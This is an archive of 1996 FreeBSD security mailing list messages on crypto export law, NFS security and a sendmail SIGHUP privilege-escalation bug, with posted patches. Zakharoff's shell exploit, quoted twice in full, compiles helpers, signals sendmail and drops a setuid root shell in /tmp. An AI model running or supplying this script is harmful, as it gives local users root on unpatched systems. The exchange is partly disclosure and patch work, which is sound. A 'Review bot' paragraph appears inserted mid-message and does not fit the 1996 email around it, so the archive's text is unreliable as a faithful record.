XAA22421 for security-outgoing; Thu, 14 Nov 1996 23:37:26 -0800 (PST) Received: from bitbucket.edmweb.com (bitbucket.edmweb.com [204.244.190.9]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id XAA22416 for ; Thu, 14 Nov 1996 23:37:23 -0800 (PST) Received: (from steve@localhost) by bitbucket.edmweb.com (8.6.12/8.6.12) id XAA00828; Thu, 14 Nov 1996 23:36:31 -0800 Date: Thu, 14 Nov 1996 23:36:25 -0800 (PST) 
From: Steve Reid To: pgiffuni@fps.biblos.unal.edu.co cc: freebsd-security@freebsd.org Subject: Re: Secure RPC revisited In-Reply-To: <328C221D.44A4@ingenieria.ingsala.unal.edu.co> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > Well, there's another solution, you can telnet to Canada, or another > part of the free world, and write your encryption there. Technically > speaking you are not exporting the software, Technically you _are_ exporting it over the telnet connection. Of course, if you use Ssh instead of telnet nobody will know. :) I am not a lawyer but it seems to me that ITAR applies to whatever the anti-crypto powers want it to apply to. The "crypto hooks" part is so broad that it could potentially allow a piece of wire to be considered a munition since you could plug crypto into it (same as plugging it into crypto). The anti-crypto forces are somewhat limited in what they _do_ prosecute, because if they prosecute something stupid the law could be thrown out on constitutional grounds. > but then Walnut Creek, Netscape, IBM and the others should follow > OpenBSD and move their headquarters to Canada. I may be mistaken, but I think taxes are quite a bit higher up here. The US crypto export matter is currently before the courts. Hopefully the courts will decide that crypto-related parts of ITAR are unconstitutional. There's also the "Pro-CODE" bill trying to get through Congress, but I guess the courts will probably be where it's won, just like with the CDA. > Is it possible to have a Blue Ribbon Campaign part II, to liberate free > software from "US military masterminds"? I'm sure many US companies are > having the same problem with their software and would support such a > campaign. There's the Golden Key Campaign. 
See http://www.privacy.org/ipc/ From owner-freebsd-security Fri Nov 15 01:18:34 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA29045 for security-outgoing; Fri, 15 Nov 1996 01:18:34 -0800 (PST) Received: from relay.nuxi.com (nuxi.cs.ucdavis.edu [128.120.56.38]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA29038 for ; Fri, 15 Nov 1996 01:18:21 -0800 (PST) Received: (from obrien@localhost) by relay.nuxi.com (8.7.5/8.6.12) id BAA04190; Fri, 15 Nov 1996 01:18:38 -0800 (PST) Message-Id: <199611150918.BAA04190@relay.nuxi.com> Date: Fri, 15 Nov 1996 01:18:38 -0800 
From: obrien@NUXI.com (David E. O'Brien) To: freebsd-security@freebsd.org Subject: Re: Secure RPC revisited References: <5l7mnpaxma.fsf@assaris.sics.se> <26411.847964643@verdi.nethelp.no> X-Mailer: Mutt 0.48.1-PL0 Mime-Version: 1.0 X-PGP-Fingerprint: B7 4D 3E E9 11 39 5F A3 90 76 5D 69 58 D9 98 7A X-Pgp-Keyid: 34F9F9D5 In-Reply-To: <26411.847964643@verdi.nethelp.no>; from sthaug@nethelp.no on Nov 14, 1996 10:44:03 +0100 Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk sthaug@nethelp.no writes: > > Yes. Bruce Schneier's book "Applied Cryptography" contains source code > for a lot of different crypto algorithms. The book can be (and indeed > is) freely exported from the US. The *diskette* containing the source > code can *not* be exported It is because of this crap that Philip Zimmermann published a book that is nothing more than code listings of PGP in scanner-friendly OCR font. See, books are protected under the 1st amendment (right to free speech) to the US Constitution. Also, being a book, it is well understood that it can't be censored. -- David (obrien@cs.ucdavis.edu) From owner-freebsd-security Fri Nov 15 07:19:32 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA19807 for security-outgoing; Fri, 15 Nov 1996 07:19:32 -0800 (PST) Received: from pluscom.cronyx.ru (gw.rinet.ru [194.87.171.65]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id HAA19764 for ; Fri, 15 Nov 1996 07:18:28 -0800 (PST) Received: by pluscom.cronyx.ru id SAA07972; (8.6.11/vak/1.9) Fri, 15 Nov 1996 18:16:53 +0300 Date: Fri, 15 Nov 1996 18:16:53 +0300 
From: marck@pluscom.cronyx.ru (Dmitry Morozovsky) Message-Id: <199611151516.SAA07972@pluscom.cronyx.ru> To: freebsd-security@freebsd.org Subject: Re: NFS Server, is it secure? Newsgroups: freebsd.security X-Newsreader: TIN [version 1.2 PL2] Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Mark Newton wrote: > Well, yes -- NFS is basically never "secure" on any platform. The > NFS protocol was never designed with security in mind. > If you know (or can guess) the NFS filehandle for an NFS filesystem > root then you can spoof the protocol for a start. > Firewall your NFS server: Its services should not be reachable from > the Internet-at-large. Is NFS server with no exports with write permissions vulnerable too? -- Sincerely, D.Marck ======================================================================== === D.Marck --- Dmitry Morozovsky --- marck@rinet.ru --- Wild Woozle === ======================================================================== From owner-freebsd-security Fri Nov 15 13:11:14 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA16444 for security-outgoing; Fri, 15 Nov 1996 13:11:14 -0800 (PST) Received: from fps.biblos.unal.edu.co ([168.176.37.11]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id NAA16423; Fri, 15 Nov 1996 13:10:53 -0800 (PST) 
From: pgiffuni@fps.biblos.unal.edu.co Received: from localhost by fps.biblos.unal.edu.co (AIX 4.1/UCB 5.64/4.03) id AA02902; Fri, 15 Nov 1996 16:17:00 -0500 Date: Fri, 15 Nov 1996 16:16:57 -0500 (EST) To: security@freebsd.org Cc: ports@freebsd.org Subject: Exportable socks5 ! Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk There's an exportable version of socks5, and they support FreeBSD 2.x ! It's available at: http://www.socks.nec.com/download.html Pedro. From owner-freebsd-security Fri Nov 15 14:37:16 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA22712 for security-outgoing; Fri, 15 Nov 1996 14:37:16 -0800 (PST) Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA22694; Fri, 15 Nov 1996 14:36:50 -0800 (PST) Received: (from smap@localhost) by whistle.com (8.7.5/8.6.12) id OAA07077; Fri, 15 Nov 1996 14:36:07 -0800 (PST) Received: from crab.whistle.com(207.76.205.112) by whistle.com via smap (V1.3) id sma007073; Fri Nov 15 14:36:05 1996 Received: (from ambrisko@localhost) by crab.whistle.com (8.7.6/8.6.12) id OAA01396; Fri, 15 Nov 1996 14:35:05 -0800 (PST) 
From: Doug Ambrisko Message-Id: <199611152235.OAA01396@crab.whistle.com> Subject: Re: Exportable socks5 ! In-Reply-To: from "pgiffuni@fps.biblos.unal.edu.co" at "Nov 15, 96 04:16:57 pm" To: pgiffuni@fps.biblos.unal.edu.co Date: Fri, 15 Nov 1996 14:35:05 -0800 (PST) Cc: security@FreeBSD.org, ports@FreeBSD.org X-Mailer: ELM [version 2.4ME+ PL25 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk pgiffuni@fps.biblos.unal.edu.co writes: | There's an exportable version of socks5, and they support FreeBSD 2.x ! | It's available at: | http://www.socks.nec.com/download.html In fact it is in the ports collection already, we can't make a package of it due to terms. Thanks to the author, I was able to get him to put in that plug for FreeBSD! Doug A. From owner-freebsd-security Fri Nov 15 15:45:44 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA27747 for security-outgoing; Fri, 15 Nov 1996 15:45:44 -0800 (PST) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id PAA27742 for ; Fri, 15 Nov 1996 15:45:41 -0800 (PST) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id SAA29894; Fri, 15 Nov 1996 18:42:49 -0500 
From: Adam Shostack Message-Id: <199611152342.SAA29894@homeport.org> Subject: Re: NFS Server, is it secure? In-Reply-To: <199611151516.SAA07972@pluscom.cronyx.ru> from Dmitry Morozovsky at "Nov 15, 96 06:16:53 pm" To: marck@pluscom.cronyx.ru (Dmitry Morozovsky) Date: Fri, 15 Nov 1996 18:42:49 -0500 (EST) Cc: freebsd-security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Dmitry Morozovsky wrote: | Mark Newton wrote: | > Well, yes -- NFS is basically never "secure" on any platform. The | > NFS protocol was never designed with security in mind. | | > If you know (or can guess) the NFS filehandle for an NFS filesystem | > root then you can spoof the protocol for a start. | | > Firewall your NFS server: Its services should not be reachable from | > the Internet-at-large. | | Is NFS server with no exports with write permissions vulnerable too? It depends if you're keeping confidential information on the server. But if you're going to export it read only, might as well put it on the web. Adam -- "It is seldom that liberty of any kind is lost all at once." 
-Hume From owner-freebsd-security Sat Nov 16 11:27:49 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA14302 for security-outgoing; Sat, 16 Nov 1996 11:27:49 -0800 (PST) Received: from cwsys.cwent.com (cschuber.net.gov.bc.ca [142.31.240.113]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id LAA14295; Sat, 16 Nov 1996 11:27:38 -0800 (PST) Received: from cwsys (1000@localhost [127.0.0.1]) by cwsys.cwent.com (8.8.2/8.6.10) with ESMTP id LAA04262; Sat, 16 Nov 1996 11:27:33 -0800 (PST) Message-Id: <199611161927.LAA04262@cwsys.cwent.com> Reply-to: cschuber@uumail.gov.bc.ca X-Mailer: Xmh To: security-officer@freebsd.org cc: freebsd-security@freebsd.org Subject: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Date: Sat, 16 Nov 1996 11:27:28 -0800 
From: Cy Schubert Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk This appears to be a better fix, and it works too. Regards, Phone: (604)389-3827 Cy Schubert OV/VM: BCSC02(CSCHUBER) Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET ITSD Internet: cschuber@uumail.gov.bc.ca cschuber@bcsc02.gov.bc.ca "Quit spooling around, JES do it." ------- Forwarded Message Received: from localhost (15005@localhost [127.0.0.1]) by passer.osg.gov.bc.ca (8.8.2/8.6.10) with SMTP id IAA23212 for cy; Sat, 16 Nov 1996 08:40:16 -0800 (PST) X-UIDL: 848169128.001 Resent-From: Cy Schubert - ITSD Open Systems Group Resent-Message-Id: <199611161640.IAA23212@passer.osg.gov.bc.ca> Received: from orca.gov.bc.ca (orca.gov.bc.ca [142.32.102.25]) by passer.osg.gov.bc.ca (8.8.2/8.6.10) with SMTP id IAA22021 for ; Sat, 16 Nov 1996 08:40:15 -0800 (PST) Received: from pdx1.world.net by orca.gov.bc.ca (5.4R3.10/200.1.1.4) id AA02926; Sat, 16 Nov 1996 08:40:13 -0800 Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id IAA02623; Sat, 16 Nov 1996 08:38:55 -0800 (PST) Received: (list@localhost) by suburbia.net (8.7.4/Proff-950810) id DAA30954; Sun, 17 Nov 1996 03:35:59 +1100 Prev-Resent-Date: Sun, 17 Nov 1996 03:35:59 +1100 Old-X-Envelope-From: cjs@portal.ca Sun Nov 17 03:27:52 1996 X-Authentication-Warning: didactic.cynic.net: cjs owned process doing -bs Date: Sat, 16 Nov 1996 00:15:39 -0800 (PST) 
From: Curt Sampson X-Sender: cjs@didactic To: Leshka Zakharoff Cc: best-of-security@suburbia.net In-Reply-To: <199611160110.EAA04168@leshka.chuvashia.su> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Approved: proff@suburbia.net Prev-Resent-Message-Id: <"2hTZt3.0.dZ7.krUZo"@suburbia> Prev-Resent-From: best-of-security@suburbia.net X-Mailing-List: archive/latest/509 X-Loop: best-of-security@suburbia.net Precedence: list Prev-Resent-Sender: best-of-security-request@suburbia.net Subject: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Resent-To: cy@uumail.gov.bc.ca Resent-Date: Sat, 16 Nov 96 08:40:16 -0800 Resent-XMts: smtp Huh. Yet another gaping hole, can you believe it? This is entirely platform-independent, and has not yet been fixed in 8.2.2. Here's the patch to fix it. This was done on 8.7.6; the line numbers may differ in other versions but the patch is the same. - ------------------------------------------------------ - --- main.c.old Mon Sep 16 12:56:01 1996 +++ main.c Fri Nov 15 23:56:48 1996 @@ -1693,14 +1693,16 @@ sighup() { #ifdef LOG if (LogLevel > 3) syslog(LOG_INFO, "restarting %s on signal", SaveArgv[0]); #endif releasesignal(SIGHUP); + (void) setgid(RealGid); + (void) setuid(RealUid); execv(SaveArgv[0], (ARGV_T) SaveArgv); #ifdef LOG if (LogLevel > 0) syslog(LOG_ALERT, "could not exec %s: %m", SaveArgv[0]); #endif exit(EX_OSFILE); } - ------------------------------------------------------ Now who the heck do I send this to to get it back into sendmail? There are no e-mail addresses listed for bug reports in the READ_ME file, or anywhere else for that matter. cjs Curt Sampson cjs@portal.ca Info at http://www.portal.ca/ Internet Portal Services, Inc. Vancouver, BC (604) 257-9400 De gustibus, aut bene aut nihil. On Sat, 16 Nov 1996, Leshka Zakharoff wrote: > Date: Sat, 16 Nov 1996 04:10:16 +0300 (MSK) 
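Review bot: the two calls added ahead of execv() in sighup(), `(void) setgid(RealGid);` and `(void) setuid(RealUid);`, throw away their return values, so if either call fails the handler still goes on to execv(SaveArgv[0], ...) with the privileges it already held, which is the case the change is meant to close. Test both results and, on failure, log at LOG_ALERT the way the existing "could not exec" branch does and exit(EX_OSFILE) without re-executing. The order is right and should stay: the group is changed first, while the process can still do so, and the uid second. A short comment above the two calls saying that SaveArgv[0] is supplied by whoever started the process, and that this is why privileges are dropped before the re-exec, would keep a later cleanup from removing them.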
> From: Leshka Zakharoff > To: best-of-security@suburbia.net > Subject: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). > Resent-Date: Sat, 16 Nov 1996 17:32:01 +1100 > Resent-From: best-of-security@suburbia.net > > #-------------------------------- CUT HERE ------------------------------------- > #/bin/sh > # > # > # Hi ! > # This is exploit for sendmail smtpd bug > # (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms). > # This shell script does a root shell in /tmp directory. > # If you have any problems with it, drop me a letter. > # Have fun ! > # > # > # ---------------------- > # --------------------------------------------- > # ----------------- Dedicated to my beautiful lady ------------------ > # --------------------------------------------- > # ---------------------- > # > # Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su > # > # > # > echo 'main() '>>leshka.c > echo '{ '>>leshka.c > echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c > echo '} '>>leshka.c > # > # > echo 'main() '>>smtpd.c > echo '{ '>>smtpd.c > echo ' setuid(0); setgid(0); '>>smtpd.c > echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c > echo '} '>>smtpd.c > # > # > cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c > ./leshka > kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1` > rm leshka.c leshka smtpd.c /tmp/smtpd > /tmp/sh > #-------------------------------- CUT HERE ------------------------------------- > > ------- End of Forwarded Message From owner-freebsd-security Sat Nov 16 11:47:58 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA15202 for security-outgoing; Sat, 16 Nov 1996 11:47:58 -0800 (PST) Received: from procert.cert.dfn.de (root@procert.cert.dfn.de [134.100.14.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id LAA15194; Sat, 16 Nov 1996 11:47:50 -0800 (PST) Received: from tiger.cert.dfn.de (ley@tiger.cert.dfn.de 
[134.100.14.11]) by procert.cert.dfn.de (8.8.2/8.8.2) with ESMTP id UAA14556; Sat, 16 Nov 1996 20:49:00 +0100 (MET) 
From: Wolfgang Ley Received: (from ley@localhost) by tiger.cert.dfn.de (8.8.2/8.8.2) id UAA09254; Sat, 16 Nov 1996 20:48:59 +0100 (MET) Message-Id: <199611161948.UAA09254@tiger.cert.dfn.de> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). To: cschuber@uumail.gov.bc.ca Date: Sat, 16 Nov 1996 20:48:58 +0100 (MET) Cc: security-officer@FreeBSD.org, freebsd-security@FreeBSD.org In-Reply-To: <199611161927.LAA04262@cwsys.cwent.com> from "Cy Schubert" at Nov 16, 96 11:27:28 am Organization: DFN-CERT (Computer Emergency Response Team, Germany) Content-Type: text Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- Cy Schubert wrote: > > This appears to be a better fix, and it works too. May work... Why do people ignore return values? Especially of such important calls like setgid() and setuid()? *bad* idea... By the way: Eric Allman has produced a much better fix. I expect it to be publicly available very shortly. Bye, Wolfgang. - -- Wolfgang Ley, DFN-CERT, Vogt-Koelln-Str. 30, 22527 Hamburg, Germany Email: ley@cert.dfn.de Phone: +49 40 5494-2262 Fax: +49 40 5494-2241 PGP-Key available via finger ley@ftp.cert.dfn.de any key-server or via WWW from http://www.cert.dfn.de/~ley/ ...have a nice day > > > Regards, Phone: (604)389-3827 > Cy Schubert OV/VM: BCSC02(CSCHUBER) > Open Systems Support BITNET: CSCHUBER@BCSC02.BITNET > ITSD Internet: cschuber@uumail.gov.bc.ca > cschuber@bcsc02.gov.bc.ca > > "Quit spooling around, JES do it." 
> > ------- Forwarded Message > > Received: from localhost (15005@localhost [127.0.0.1]) by passer.osg.gov.bc.ca (8.8.2/8.6.10) with SMTP id IAA23212 for cy; Sat, 16 Nov 1996 08:40:16 -0800 (PST) > X-UIDL: 848169128.001 > Resent-From: Cy Schubert - ITSD Open Systems Group > Resent-Message-Id: <199611161640.IAA23212@passer.osg.gov.bc.ca> > Received: from orca.gov.bc.ca (orca.gov.bc.ca [142.32.102.25]) by passer.osg.gov.bc.ca (8.8.2/8.6.10) with SMTP id IAA22021 for ; Sat, 16 Nov 1996 08:40:15 -0800 (PST) > Received: from pdx1.world.net by orca.gov.bc.ca (5.4R3.10/200.1.1.4) > id AA02926; Sat, 16 Nov 1996 08:40:13 -0800 > Received: from suburbia.net (suburbia.net [203.4.184.1]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id IAA02623; Sat, 16 Nov 1996 08:38:55 -0800 (PST) > Received: (list@localhost) by suburbia.net (8.7.4/Proff-950810) id DAA30954; Sun, 17 Nov 1996 03:35:59 +1100 > Prev-Resent-Date: Sun, 17 Nov 1996 03:35:59 +1100 > Old-X-Envelope-From: cjs@portal.ca Sun Nov 17 03:27:52 1996 > X-Authentication-Warning: didactic.cynic.net: cjs owned process doing -bs > Date: Sat, 16 Nov 1996 00:15:39 -0800 (PST) 
> From: Curt Sampson > X-Sender: cjs@didactic > To: Leshka Zakharoff > Cc: best-of-security@suburbia.net > In-Reply-To: <199611160110.EAA04168@leshka.chuvashia.su> > Message-Id: > Mime-Version: 1.0 > Content-Type: TEXT/PLAIN; charset=US-ASCII > Approved: proff@suburbia.net > Prev-Resent-Message-Id: <"2hTZt3.0.dZ7.krUZo"@suburbia> > Prev-Resent-From: best-of-security@suburbia.net > X-Mailing-List: archive/latest/509 > X-Loop: best-of-security@suburbia.net > Precedence: list > Prev-Resent-Sender: best-of-security-request@suburbia.net > Subject: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). > Resent-To: cy@uumail.gov.bc.ca > Resent-Date: Sat, 16 Nov 96 08:40:16 -0800 > Resent-XMts: smtp > > > Huh. Yet another gaping hole, can you believe it? This is entirely > platform-independent, and has not yet been fixed in 8.2.2. Here's > the patch to fix it. This was done on 8.7.6; the line numbers may > differ in other versions but the patch is the same. > > - ------------------------------------------------------ > - --- main.c.old Mon Sep 16 12:56:01 1996 > +++ main.c Fri Nov 15 23:56:48 1996 
> @@ -1693,14 +1693,16 @@ > sighup() > { > #ifdef LOG > if (LogLevel > 3) > syslog(LOG_INFO, "restarting %s on signal", SaveArgv[0]); > #endif > releasesignal(SIGHUP); > + (void) setgid(RealGid); > + (void) setuid(RealUid); > execv(SaveArgv[0], (ARGV_T) SaveArgv); > #ifdef LOG > if (LogLevel > 0) > syslog(LOG_ALERT, "could not exec %s: %m", SaveArgv[0]); > #endif > exit(EX_OSFILE); > } > - ------------------------------------------------------ > > Now who the heck do I send this to to get it back into sendmail? There > are no e-mail addresses listed for bug reports in the READ_ME file, or > anywhere else for that matter. > > cjs > > Curt Sampson cjs@portal.ca Info at http://www.portal.ca/ > Internet Portal Services, Inc. > Vancouver, BC (604) 257-9400 De gustibus, aut bene aut nihil. > > On Sat, 16 Nov 1996, Leshka Zakharoff wrote: > > > Date: Sat, 16 Nov 1996 04:10:16 +0300 (MSK) 
> > From: Leshka Zakharoff > > To: best-of-security@suburbia.net > > Subject: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). > > Resent-Date: Sat, 16 Nov 1996 17:32:01 +1100 > > Resent-From: best-of-security@suburbia.net > > > > #-------------------------------- CUT HERE ------------------------------------- > > #/bin/sh > > # > > # > > # Hi ! > > # This is exploit for sendmail smtpd bug > > # (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms). > > # This shell script does a root shell in /tmp directory. > > # If you have any problems with it, drop me a letter. > > # Have fun ! > > # > > # > > # ---------------------- > > # --------------------------------------------- > > # ----------------- Dedicated to my beautiful lady ------------------ > > # --------------------------------------------- > > # ---------------------- > > # > > # Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su > > # > > # > > # > > echo 'main() '>>leshka.c > > echo '{ '>>leshka.c > > echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c > > echo '} '>>leshka.c > > # > > # > > echo 'main() '>>smtpd.c > > echo '{ '>>smtpd.c > > echo ' setuid(0); setgid(0); '>>smtpd.c > > echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c > > echo '} '>>smtpd.c > > # > > # > > cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c > > ./leshka > > kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1` > > rm leshka.c leshka smtpd.c /tmp/smtpd > > /tmp/sh > > #-------------------------------- CUT HERE ------------------------------------- > > > > > > > > ------- End of Forwarded Message > > -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMo4aqAQmfXmOCknRAQHtpgP/WqCBZh95dD2yKsy9v2bv65aH8qULXNOl pFq2UYuquVxtx9NOqxROtD+nlE6Sr1PfHtQz2wunUk1LDeSFb7KhJjmuu2HtnCVd q7j3rA7hDJiXuZlqXyKWMhzxShph8cn4hxYO+by9NqEyn/eGU1veGzsJFfW+Zla/ +5Qa4S7jWIs= =0CXZ -----END PGP SIGNATURE----- From owner-freebsd-security Sat Nov 16 14:09:43 1996 
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA23537 for security-outgoing; Sat, 16 Nov 1996 14:09:43 -0800 (PST)
Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.fr [193.56.58.253]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA23523 for ; Sat, 16 Nov 1996 14:09:27 -0800 (PST)
Received: from brasil.brainstorm.eu.org (brasil.brainstorm.fr [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id XAA11900 for ; Sat, 16 Nov 1996 23:09:18 +0100
Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id XAA23144 for freebsd-security@freebsd.org; Sat, 16 Nov 1996 23:08:57 +0100
Received: (from roberto@localhost) by keltia.freenix.fr (8.8.2/keltia-uucp-2.9) id XAA17097; Sat, 16 Nov 1996 23:07:43 +0100 (MET)
Message-ID:
Date: Sat, 16 Nov 1996 23:07:42 +0100
From: roberto@keltia.freenix.fr (Ollivier Robert)
To: freebsd-security@freebsd.org
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
References: <199611161927.LAA04262@cwsys.cwent.com> <199611161948.UAA09254@tiger.cert.dfn.de>
X-Mailer: Mutt 0.50.05
Mime-Version: 1.0
X-Operating-System: FreeBSD 3.0-CURRENT ctm#2686
In-Reply-To: <199611161948.UAA09254@tiger.cert.dfn.de>; from Wolfgang Ley on Nov 16, 1996 20:48:58 +0100
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

According to Wolfgang Ley:
> By the way: Eric Allman has produced a much better fix. I expect it to
> be publicly available very shortly.

8.8.3 will be available shortly. The fix is already in 2.2 and 3.0-CURRENT.
I'm not sure for 2.1.6 as Jordan just announced it.
--
Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 3.0-CURRENT #28: Sun Nov 10 13:37:41 MET 1996

From owner-freebsd-security Sat Nov 16 16:04:57 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA28867 for security-outgoing; Sat, 16 Nov 1996 16:04:57 -0800 (PST)
Received: from super-g.inch.com (spork@super-g.com [204.178.32.161]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA28849; Sat, 16 Nov 1996 16:04:48 -0800 (PST)
Received: from localhost (spork@localhost) by super-g.inch.com (8.7.6/8.6.9) with SMTP id SAA12948; Sat, 16 Nov 1996 18:03:13 -0500
Date: Sat, 16 Nov 1996 17:03:13 -0600 (CST)
From: "S(pork)"
X-Sender: spork@super-g.inch.com
To: freebsd-security@freebsd.org, freebsd-hackers@freebsd.org
Subject: New sendmail bug...
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

It's nasty and easy... If you're on Bugtraq, you saw it. If anyone with
more knowledge on this issue can check it out, please post to the list so
everyone can free themselves of this vulnerability. Root in under 15
seconds with an account on the machine. If you need the 'sploit, please
mail me here and I'll send it to you. I verified it on FBSD, NetBSD,
Linux so far...

TIA

Charles

From owner-freebsd-security Sat Nov 16 16:17:31 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA29297 for security-outgoing; Sat, 16 Nov 1996 16:17:31 -0800 (PST)
Received: from Kitten.mcs.com (Kitten.mcs.com [192.160.127.90]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA29277; Sat, 16 Nov 1996 16:17:26 -0800 (PST)
Received: from Mailbox.mcs.com (Mailbox.mcs.com [192.160.127.87]) by Kitten.mcs.com (8.8.2/8.8.2) with ESMTP id SAA26299; Sat, 16 Nov 1996 18:17:25 -0600 (CST)
Received: from Jupiter.Mcs.Net (karl@Jupiter.mcs.net [192.160.127.88]) by Mailbox.mcs.com (8.8.2/8.8.2) with ESMTP id SAA01993; Sat, 16 Nov 1996 18:17:24 -0600 (CST)
Received: (from karl@localhost) by Jupiter.Mcs.Net (8.8.2/8.8.2) id SAA16884; Sat, 16 Nov 1996 18:17:23 -0600 (CST)
From: Karl Denninger
Message-Id: <199611170017.SAA16884@Jupiter.Mcs.Net>
Subject: Re: New sendmail bug...
To: spork@super-g.com (S)
Date: Sat, 16 Nov 1996 18:17:23 -0600 (CST)
Cc: freebsd-security@FreeBSD.org, freebsd-hackers@FreeBSD.org
In-Reply-To: from "S" at Nov 16, 96 05:03:13 pm
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

>
> It's nasty and easy... If you're on Bugtraq, you saw it. If anyone with
> more knowledge on this issue can check it out, please post to the list so
> everyone can free themselves of this vulnerability. Root in under 15
> seconds with an account on the machine. If you need the 'sploit, please
> mail me here and I'll send it to you. I verified it on FBSD, NetBSD,
> Linux so far...
>
> TIA
>
> Charles

It's real - and the fix is two lines inserted in the sighup() handler:

        setgid(RealGid);
        setuid(RealUid);

prior to the exec call.

--
--
Karl Denninger (karl@MCS.Net)| MCSNet - The Finest Internet Connectivity
http://www.mcs.net/~karl     | T1's from $600 monthly to FULL DS-3 Service
                             | 33 Analog Prefixes, 13 ISDN, Web servers $75/mo
Voice: [+1 312 803-MCS1 x219]| Email to "info@mcs.net" WWW: http://www.mcs.net/
Fax:   [+1 312 248-9865]     | 2 FULL DS-3 Internet links; 400Mbps B/W Internal

From owner-freebsd-security Sat Nov 16 16:26:36 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA29836 for security-outgoing; Sat, 16 Nov 1996 16:26:36 -0800 (PST)
Received: from super-g.inch.com (spork@super-g.com [204.178.32.161]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA29817; Sat, 16 Nov 1996 16:26:32 -0800 (PST)
Received: from localhost (spork@localhost) by super-g.inch.com (8.7.6/8.6.9) with SMTP id SAA13138; Sat, 16 Nov 1996 18:24:55 -0500
